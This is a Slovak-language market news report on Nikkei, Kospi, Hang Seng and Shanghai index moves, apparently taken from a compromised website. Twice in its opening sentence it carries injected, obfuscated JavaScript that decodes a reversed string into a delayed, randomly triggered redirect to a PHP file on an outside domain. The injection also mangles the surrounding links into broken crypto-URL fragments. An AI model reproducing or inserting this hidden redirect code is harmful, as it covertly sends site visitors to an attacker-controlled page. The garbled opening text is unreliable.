stock-exchange, akcie

Hlavné ázijské burzy s výnimkou Šanghaja posilňujú

$mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dovanie-s-kryptomena/“>Hong Kong, $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dokoncenim-legislativy-pre-kryptomeny-a-blockchain/“>Soul aj Tokio zahájili nielen obchodný týždeň, ale aj nový mesiac rastom. Indexy na hlavných ázijských burzách sa vydali smerom nahor. Výnimkou je burza v Šanghaji, ktorá pondelkové obchodovanie zakončila kladnou nulou.

Tokijský burzový index Nikkei v pondelok posilnil o bezmála 1,5 percenta. Vymazal tak všetky piatkové straty a odrazil sa z najnižšej úrovne za posledné dva mesiace. Smerom nahor Nikkei zamieril vďaka výsledkovej sezóne, kedy jednotlivé spoločnosti oznamujú finančné dáta za tretí kvartál. A práve firmy, ktorých hospodárenie sa vyvíja v súlade s ekonomickým cyklom pozitívne prekvapili investorov. Ukázalo sa totiž, že sa zotavujú a niektoré dokonca zlepšujú svoj celoročný výhľad.

Podobne silne vzrástol tiež hlavný index akciového trhu v Soule. Jeho rast o 1,46 percenta predstavuje najväčší denný prírastok za viac ako dva mesiace. Burza pozitívne reagovala na dáta o čínskej aktivite v priemysle, ktorá sa zvýšila najrýchlejšie za poslednú dekádu, a to najmä vďaka domácemu dopytu. Je až paradoxné, že šanghajská burza zaznamenala prírastok len o 0,02 percenta. Hongkonský index Hang Seng pridal navlas rovnako ako burza v Soule, teda 1,46 percenta a taktiež bol ťahaný predovšetkým priaznivými dátami z Číny.

Jeden komentář

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *